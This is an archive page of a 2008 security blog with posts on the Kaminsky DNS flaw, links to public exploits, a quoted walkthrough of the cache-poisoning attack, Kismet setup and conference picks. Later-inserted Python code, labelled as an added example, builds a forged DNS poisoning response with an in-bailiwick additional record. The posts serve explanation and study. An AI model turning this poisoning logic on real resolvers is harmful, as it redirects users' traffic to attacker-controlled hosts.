
contact Wesley McGrew: | email - wesley@mcgrewsecurity.com | gpg key | aim - wesleymcgrew | twitter - mcgrewsecurity |

McGrew Security Blog

Archive for July, 2008

Blackhat USA 2008 Fantasy League

Thursday, July 31st, 2008

Everybody else is posting their picks for the talks they want to attend at Blackhat USA 2008.  I’m not going, but Chris Gates, of the excellent carnal0wnage blog, and I have decided to post our picks as part of an armchair “Blackhat Fantasy League”.  This’ll serve as a nice reference for myself when audio/video of the conference is released too.

(Edit: Chris just posted his picks.  There’s a nice web security flavor to his choices)

It really is a shame that I won’t be able to go, since our good friend Yousif Yalda promised to “beat me down” there.  Assuming I could make it to each talk, between all the beatings, here’s where I’d like to be:

Day 1 - 10:00 - 11:00

Fyodor Vaskovich - Track: The Network

This is going to be outstanding.  I always enjoy hearing Fyodor talk about nmap internals and tricks used to get more speed out of it.

Day 1 - 11:15 - 12:30

Dan Kaminsky - DNS Goodness

Pretty obvious choice here.  I feel sorry for the other speakers on during this time slot.

Day 1 - 13:45 - 16:30

Lots of folks - Iron Chef Fuzzing Challenge

Jacob West, Charlie Miller, Geoff Morrison, Jacob Honoroff, Sean Fay, Brian Chess finding vulnerabilities, Iron Chef style.  The Cisco shellcode/backdoor talk almost beats this out, but I had a lot of fun listening to the last Iron Chef challenge.

Day 1 - 16:45 - 18:00

Val Smith, Colin Ames - MetaPost-Exploitation

I’m on a Metasploit kick right now :)

Day 1 - 18:00 -

The Pwnie Awards

Day 2 - 10:00 - 11:00

Felix Lindner - Developments in Cisco IOS Forensics

I haven’t gotten my hands dirty with the guts of IOS, so I think I would enjoy this.

Day 2 - 11:15 - 12:30

Eric Filiol - Passive and Active Leakage of Secret Data from Non-Networked Computer

The description on the Blackhat site is kind of vague, but it sounds fascinating.

Day 2 - 13:45 - 16:30 (?)

Lukas Grunwald - Hacking and Injecting Federal Trojans

Law enforcement injecting trojans into software downloads… neat… (this one is scheduled back to back with itself, so I don’t know if it’s a continuation or what?)

Day 2 - 16:45 - 18:00

Patrick McGregor - Braving the Cold : New Methods for Preventing Cold Boot Attacks on Encryption Keys

Having written msramdmp, I definitely have an interest in talks on cold-boot memory attacks :)

I’m calling it: the new cool-guy word is “Weaponize”

Thursday, July 24th, 2008

…and I couldn’t be happier.  I’m going to start writing “weaponized code” instead of “exploits”.  This will totally make up for having to give up “reverse-engineering” for “deep analysis” for “legal reasons” ;).

However you feel about people publishing exploits for the DNS flaw already, there’s a selection of them out there now, and you might as well have a look at the code if you’re a penetration tester.  Now, I’m going to give out some links to these, so if you happen to be a blackhat that relies only on this site for your exploit needs, I’m going to have to ask you to go ahead and close your browser:

  • I)ruid and H D Moore’s metasploit module (and in the context of the trunk version of metasploit) - This one’s pretty nice.  Like a good metasploit module, it has functionality built in to test a server for vulnerability.  It can’t spoof if there’s already a cached entry for the domain you’re trying to spoof; however, it is smart enough to check for this ahead of time and sleep until it can try again.  This one also randomizes the domain names it’s using while it tries to guess the transaction ID.
  • Julien Desfossez’s standalone exploit - Fewer frills than the metasploit module, but it gets points for being written in python with the excellent Scapy.  From the code, it looks like the domain names it’s using while guessing the transaction ID are pretty predictable:  a3.victim.com, a4.victim.com, a5.victim.com, etc. etc. etc.

I’ll talk about other exploits when I see them, if I think they’re interesting.  I’m honestly surprised it’s taken as long as it has for exploits to come out, as it’s a pretty easy vulnerability to wrap your head around, and pretty straightforward to generate the packets.

This’ll give you something to play with in the lab while the Internet crumbles around you.

Edit:

This about sums up my thoughts:

I guarantee that |)ruid/hdm’s exploit was not the first. Who would you prefer poisons your cache: discreet pros or kiddies with metasploit?

Thanks Dino.

Talking about DNS on the Securabyte 1 Podcast

Tuesday, July 22nd, 2008

The folks who put on the excellent Securabit podcast have decided to put together a quick and dirty episode-between-episodes on the recent DNS vulnerability.  They’ve decided to call these spontaneous episodes “Securabytes”, and this is the first one:

Since Dan Kaminsky doesn’t leap around the apartment to find his headset in order to podcast on a 10 minute notice at 10PM, I was grabbed off IRC to discuss the details of the vulnerability and its impact.  I had a blast recording this episode with Rob, Joel, and Martin McKeay (of the great Network Security podcast and blog).  Being able to bounce it off these guys really helped to convey not only the vulnerability itself, but what it means for admins, end users, and even penetration testers.

I hope you give it a listen, and subscribe to Securabit in your iTunes or RSS!

DNS cat is likely out of the bag

Monday, July 21st, 2008

First, a post went up on Matasano and promptly disappeared, and now Kaminsky has posted on Doxpara:

Patch.  Today.  Now. Yes, stay late.  Yes, forward to OpenDNS if you have to.  (They’re ready for your traffic.)  Thank you to the many of you who already have.

From what I can tell, it’s out of the bag.  I haven’t done any testing to make sure, but what I’ve read makes sense.  If you’re not entirely sure about your DNS, set yourself up on OpenDNS now.

Edit: Ah to heck with it, looks like everyone knows where to find it now anyways.  Here ya go, on Halvar Flake’s blog.

Edit Edit: Actually that’s not quite right, I think, but Matasano was, and I think you can figure it out from there.

Edit Edit Edit: Well, seeing as you can find out from comments on a Slashdot post, and other blogs, here’s the juicy part of the Matasano post:

Let’s try again to convince Bob that WWW.VICTIM.COM is 6.6.6.0.

This time though, instead of getting Bob to look up WWW.VICTIM.COM and then beating Alice in the race, or getting Bob to look up WWW.EVIL.COM and slipping strychnine into his ham sandwich, we’re going to be clever (sneaky).

Get Bob to look up AAAAA.VICTIM.COM. Race Alice. Alice’s answer is NXDOMAIN, because there’s no such name as AAAAA.VICTIM.COM. Mallory has an answer. We’ll come back to it. Alice has an advantage in the race, and so she likely beats Mallory. NXDOMAIN for AAAAA.VICTIM.COM.

Alice’s advantage is not insurmountable. Mallory repeats with AAAAB.VICTIM.COM. Then AAAAC.VICTIM.COM. And so on. Sometime, perhaps around CXOPQ.VICTIM.COM, Mallory wins! Bob believes CXOPQ.VICTIM.COM is 6.6.6.0!

Poisoning CXOPQ.VICTIM.COM is not super valuable to Mallory. But Mallory has another trick up her sleeve. Because her response didn’t just say CXOPQ.VICTIM.COM was 6.6.6.0. It also contained Additional RRs pointing WWW.VICTIM.COM to 6.6.6.0. Those records are in-bailiwick: Bob is in fact interested in VICTIM.COM for this query. Mallory has combined attack #1 with attack #2, defeating fix #1 and fix #2. Mallory can conduct this attack in less than 10 seconds on a fast Internet link.

Patch patch patch (then play with it in your test environment).
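The exploit notes above and the Matasano excerpt describe the same packet: a forged response for a random sibling name under VICTIM.COM whose Additional section carries an A record for WWW.VICTIM.COM, which a resolver accepts because it is in-bailiwick for the zone it was already asking about.  The following is an added example written for this page, not code from the original post, from the Metasploit module or from Desfossez’s exploit.  It builds that response in raw DNS wire format, parses it back, and runs the bailiwick check a resolver applies, so you can see which records survive and why an out-of-bailiwick additional record (WWW.BANK.COM, say) is dropped.  It does not do the network race or the transaction ID / source port guessing; the names, IP address 6.6.6.0 and transaction ID used are the ones from the excerpt or constructed for illustration.

```python
"""
Added example: wire-format shape of a Kaminsky-style poisoning response.
Not code from the original post or from any exploit it links; names and
addresses are taken from the Matasano excerpt or constructed here.
"""
import random
import string
import struct
from ipaddress import IPv4Address

QTYPE_A = 1
QCLASS_IN = 1


def encode_name(name: str) -> bytes:
    # Uncompressed wire-format name: length-prefixed labels, zero-byte terminator.
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(data: bytes, off: int):
    # Returns (lower-cased name, offset after the name). Follows compression
    # pointers, which real servers emit even though this builder never does.
    labels, jumped, end = [], False, off
    while True:
        length = data[off]
        if length & 0xC0 == 0xC0:
            ptr = struct.unpack("!H", data[off:off + 2])[0] & 0x3FFF
            if not jumped:
                end = off + 2
            off, jumped = ptr, True
            continue
        off += 1
        if length == 0:
            break
        labels.append(data[off:off + length].decode("ascii"))
        off += length
    if not jumped:
        end = off
    return ".".join(labels).lower(), end


def a_record(name: str, ip: str, ttl: int = 86400) -> bytes:
    rdata = IPv4Address(ip).packed
    return encode_name(name) + struct.pack("!HHIH", QTYPE_A, QCLASS_IN, ttl, len(rdata)) + rdata


def random_sibling(zone: str, n: int = 5) -> str:
    # Random left-most label, the way the Metasploit module does it; the
    # a3/a4/a5.victim.com scheme in the other exploit is trivially spotted in logs.
    return "".join(random.choice(string.ascii_uppercase) for _ in range(n)) + "." + zone


def build_poison_response(qname: str, txid: int, target: str, evil_ip: str) -> bytes:
    # Header flags 0x8400: QR=1 (response), AA=1. Counts: 1 question, 1 answer,
    # 0 authority, 1 additional. The additional RR is the record Mallory cares about.
    header = struct.pack("!HHHHHH", txid, 0x8400, 1, 1, 0, 1)
    question = encode_name(qname) + struct.pack("!HH", QTYPE_A, QCLASS_IN)
    return header + question + a_record(qname, evil_ip) + a_record(target, evil_ip)


def parse_response(data: bytes):
    # Returns (txid, [(section, name, ipv4)]) for the A records in the message.
    txid, _flags, qd, an, ns, ar = struct.unpack("!HHHHHH", data[:12])
    off = 12
    for _ in range(qd):
        _, off = decode_name(data, off)
        off += 4  # QTYPE + QCLASS
    records = []
    for section, count in (("answer", an), ("authority", ns), ("additional", ar)):
        for _ in range(count):
            name, off = decode_name(data, off)
            rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", data[off:off + 10])
            off += 10
            rdata = data[off:off + rdlen]
            off += rdlen
            if rtype == QTYPE_A:
                records.append((section, name, str(IPv4Address(rdata))))
    return txid, records


def in_bailiwick(name: str, zone: str) -> bool:
    name, zone = name.lower().rstrip("."), zone.lower().rstrip(".")
    return name == zone or name.endswith("." + zone)


def cacheable_records(data: bytes, zone: str):
    # What a bailiwick-checking resolver keeps from the response: anything whose
    # owner name falls under the zone it was resolving. WWW.VICTIM.COM passes.
    _, records = parse_response(data)
    return [(n, ip) for _, n, ip in records if in_bailiwick(n, zone)]


if __name__ == "__main__":
    qname = random_sibling("VICTIM.COM")
    resp = build_poison_response(qname, 0xBEEF, "WWW.VICTIM.COM", "6.6.6.0")
    print(qname, cacheable_records(resp, "victim.com"))
```

Run it and the sibling name comes back alongside WWW.VICTIM.COM; swap the target for a name outside VICTIM.COM and only the sibling survives, which is exactly the filter the old fixes relied on and the in-bailiwick trick walks past.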

Kismet on the Santa Rosa chipset MacBook

Sunday, July 20th, 2008

I purchased my MacBook right after the release of the newer Santa Rosa chipset models in late 2007, and I have to say, it’s the best laptop I’ve ever owned.  I moved to doing most of my security-related work on it, from my Latitude C400, much quicker than I expected.  I’m very happy with it.

The other day, I wanted to get Kismet up and running on OS X, which I thought would be a pain, since the newer MacBooks use a Broadcom 4328 for wireless.  KisMac is an option, as well (with some nice additional features!), but I have a long history of using Kismet in Linux and wanted to be able to use and demo it as well.  I figured I might have to resort to using an external USB wireless adapter.

As it turns out, it’s really not that difficult at all, and Kismet supports the 4328 very well in OS X.  I took notes on the commands I used, since I expected more problems than I ran into.  I think you’ll find it to be pretty straightforward:

First of all, you’ll need to install the Xcode tools from the OS X install discs, so that you have an environment to compile the code.  I decided to create a directory under “/opt/” for kismet to live in, in case I needed to compile some libraries especially for it (I expected to need a newer version of pcap, but this was not the case).  This part’s up to your taste.  You may not find it necessary:

mkdir /opt
mkdir /opt/kismet
mkdir /opt/kismet/src
cd /opt/kismet/src

Next, check out the latest development version of Kismet from the Kismet SVN:

svn co http://svn.kismetwireless.net/code/trunk kismet-devel

Now, switch to the directory with source, and run configure.  You’ll want to set the prefix if you set up a special place for Kismet to live, like I did:

cd kismet-devel
./configure --prefix=/opt/kismet/

Compile, and install:

make dep
make
sudo make install

The configuration’s pretty easy as well.  Edit the kismet.conf file (in this case, at “/opt/kismet/etc/kismet.conf”).  You’ll be making two simple changes.  Kismet wants to drop privileges to a user’s level, so look for this part of the config and change it:

suiduser=<your OS X username>

…and set up your capture source:

source=darwin,en1,airport

That’s it, really!  You can run it with “sudo /opt/kismet/bin/kismet” (might want to add it to your path).  It works very well too.  I’ve noticed that I can stay associated to an access point, while sniffing and hopping channels with Kismet.  This is better than what I could do with my old Intel 2200.
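If you are doing this on more than one machine, the two kismet.conf edits above are the only part worth scripting.  The following is an added example, not code from the original post or from the Kismet project: it rewrites the suiduser= and source= lines in place, leaves comments and other options alone, appends the line if the file lacks it, and refuses a darwin source string that is not in the type,interface,name form the post uses.  The sample configuration text is constructed for illustration; only the option names come from the post.

```python
"""
Added example: apply the suiduser= and source= edits to a kismet.conf.
Not code from the original post or the Kismet project. SAMPLE_CONF is a
constructed stand-in for the shipped file.
"""
import re

# darwin,<interface>,<name>, e.g. darwin,en1,airport (assumed format, from the post)
DARWIN_SOURCE = re.compile(r"^darwin,[A-Za-z0-9]+,[A-Za-z0-9_-]+$")


def validate_darwin_source(source: str) -> bool:
    # Reject strings with missing or extra comma-separated fields.
    return bool(DARWIN_SOURCE.match(source))


def set_option(conf: str, key: str, value: str) -> str:
    """Replace every uncommented 'key=...' line with 'key=value'; append if absent."""
    new_line = f"{key}={value}"
    pattern = re.compile(rf"^{re.escape(key)}=.*$", re.MULTILINE)
    if pattern.search(conf):
        return pattern.sub(new_line, conf)
    if not conf.endswith("\n"):
        conf += "\n"
    return conf + new_line + "\n"


def get_option(conf: str, key: str) -> list:
    # Values of every uncommented 'key=' line, in file order.
    return re.findall(rf"^{re.escape(key)}=(.*)$", conf, re.MULTILINE)


def configure_kismet(conf: str, suiduser: str, source: str) -> str:
    # The two changes the post describes, with the source string checked first
    # so a typo does not leave Kismet with no usable capture source.
    if not validate_darwin_source(source):
        raise ValueError(f"unexpected darwin source string: {source!r}")
    conf = set_option(conf, "suiduser", suiduser)
    return set_option(conf, "source", source)


SAMPLE_CONF = """\
# Kismet config file (constructed sample, not the shipped default)
version=newcore.1
# User to drop privileges to after starting
suiduser=your_user_here
# Capture sources
source=none,none,addme
logtypes=pcapdump,gpsxml,netxml
"""

if __name__ == "__main__":
    print(configure_kismet(SAMPLE_CONF, "wesley", "darwin,en1,airport"))
```

To use it against the real file, read /opt/kismet/etc/kismet.conf into a string, pass it through configure_kismet() with your OS X username, and write the result back with sudo.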

I went into the installation figuring I would make a blog post about getting it running.  I never expected it to be so easy, so this post might not even be needed!  Maybe it’ll at least let folks know ahead of time that there’s smooth sailing ;).

Princeton Cold-Boot Memory Forensics Tools Released

Friday, July 18th, 2008

Today, Jacob Appelbaum is giving a talk at The Last HOPE conference on the tools they have for dumping and retrieving keys from memory after a cold boot.  These are the tools that were demonstrated some months ago, and got everyone interested in the security of whole-disk encryption products.  There was a lot of interest in the memory dumping tool, so since the Princeton tool had not been released, I wrote msramdmp.

The Princeton tools are now available here.

The key-finding code is definitely of interest, and ought to work with msramdmp images as well (although I haven’t tested the code at all, yet).  From what I’m reading of the memory dumping code and docs, if msramdmp is currently suiting your needs, you may not need to change over, especially if you’re taking advantage of the fact that msramdmp will let you dump a few computers before having to pull the images off and reset the partitions.  If, however, you’re wanting to dump more than 4 gigs on a 64-bit machine, dump over a network, or dump an EFI-based machine, the Princeton tools are definitely what you’ll want to start playing with now.

Very cool work, Jacob!  Hope the talk goes well!

Black Ops: The Talks of Dan Kaminsky

Wednesday, July 16th, 2008

Whenever a new sure-fire blockbuster movie sequel comes out, there’s always the attempt to wring some more cash out of the previous entries.  There’ll be a DVD box set that runs about $10 a disc, with all the previous films in one nice looking collection.  These sell well, both to people new to a series wanting to catch up, as well as long-time fans.

Dan Kaminsky’s talk at this year’s Black Hat USA conference on August 6th where he drops the new DNS 0-day will undoubtedly be the sure-fire blockbuster talk of the conference.  Kaminsky has given excellent talks on various network security topics for years now, so in the spirit of a cash-in box set, I’ve spent a little time today collecting up links to previous talks he’s given.

Most of these are in his recurring theme of “TCP/IP Black Ops”, and I have learned a lot over the years, listening to these talks.  The recent ones were fairly easy to find on Google Video, however some of the older ones required digging around a bit (mostly on the EasyNews mirror).  I’ve embedded or linked video, where available.  Some talks I could only find in mp3 format.  Some of the older Defcon talks may be available in realmedia video format on the defcon site, but I really prefer to stick to non-realmedia formats.

If you need slides to go along with the audio-only talks, it looks like most of them are available on Kaminsky’s bio page.

As I said, I’ve learned a lot from these talks, and highly recommend them to anyone else interested in getting elbows-deep into network security.  Enjoy!

If you’re handy with Gimp and create box art for a Dan Kaminsky box set, leave a comment ;-)

Defcon 9 (2001): Gateway Cryptography: Hacking Impossible Tunnels Through Improbable Networks with OpenSSH

Defcon 10 (2002): Black Ops of TCP/IP

Defcon 11 (2003): Stack Black Ops

Blackhat 2004: Black Ops of DNS

22C3: Black Ops Of TCP/IP 2005.5

Toorcon 2006 - Black Ops Of TCP-IP 2006

Shmoocon 2007 - Weaponizing Noam Chomsky (or Hacking with Pattern Languages)

Defcon 15 - Black Ops 2007: Design Reviewing The Web

University of Phoenix uses Mississippi State University building in their banner ad

Tuesday, July 15th, 2008

I don’t normally pay much attention to banner ads, especially for diploma mills, but this one caught my eye:

I thought to myself, “That looks familiar.  It’s almost as if I have been there before…”

I have:

Swalm Hall, on the Mississippi State University campus.  This is about half of a mile away from where I work part time as a graduate researcher at the MSU Center for Computer Security Research while I finish up my Ph.D.  As an undergraduate, I had a technical writing class in Swalm, and attended entrepreneurship lectures in the auditorium.  While it’s a relatively new building, built while I was an undergrad, it was designed as a replica of another, older building on campus, Lee Hall:

These two buildings face each other, on opposite sides of the drill field.  I had actually convinced myself that the University of Phoenix was using an image of Lee Hall, and was halfway through writing this blog post, when I went looking for an image of Swalm Hall to give the post some character.  In the process, I stumbled across the picture of Swalm above, which appears to be the exact image they used (or very close).

We can’t quite offer a 13-month degree here, but at least we don’t have to claim buildings from other campuses :).  If you’re ever in the area and want the grand tour, let me know.

Homer Simpson’s AIM Account Hackers Own Up (sort of)

Saturday, July 12th, 2008

Regarding “Homer Simpson and the Kimya Botnet”, a new away message for Chunkylover53 (Homer Simpson’s AOL account, revealed in one of the episodes, and since hijacked) drops some names:

KRYOGENIKS EBK and DEFIANT RoXed HOMER sHouTz To VIRUS Warlock elul21 coll1er and Slacker.

I wouldn’t advise keeping him on your buddy list at this point, as the account is pushing out malware occasionally.

Sexyhacking.com censorship fail.

Saturday, July 12th, 2008

It’s a weekend, so I’m all for a fun post.

The sexyhacking.com videos are not safe for work, however they’re probably even less arousing than you’d think.  They are hosted on YouTube, after all.  You might want to have a look, though, since they’re funny (intentionally and unintentionally), and who knows how long they’ll actually be around.

In the second video, described as Episode 1 in a series called “Naughty Script K1dd13”, basic compilation and usage of nmap is covered by a somewhat disinterested teacher.  It must be hot in the classroom, since she’s unbuttoned her shirt about halfway down.  Strangely enough, while nmap is displaying its scan, they censor the IP addresses involved with COPS-style pixelization:

http://mcgrewsecurity.com/img/sexyhacking1_th.png

If you’re paying more attention to the terminal than the girl, you’ll notice that they’re not very thorough.  At 3:49, we catch the video editor asleep at the wheel as the traceroute pops up:

http://mcgrewsecurity.com/img/sexyhacking4.png

…and at 3:50, the censor wakes up :) :

http://mcgrewsecurity.com/img/sexyhacking5.png

I’m not even sure why they’re attempting to hide the IP address.  It’s stated in the narration that sexyhacking.com will be used as the target, and the IP address revealed above is simply what you’d get doing a DNS lookup of sexyhacking.com…

(so long as Dan Kaminsky isn’t angry at you)

So, to sum it up:  If you’re redacting information out of a video you’re publishing, you not only have to worry about people being able to reverse engineer your pixelation (just black it out!), you’ll also have to make sure you blot it out of every frame :) .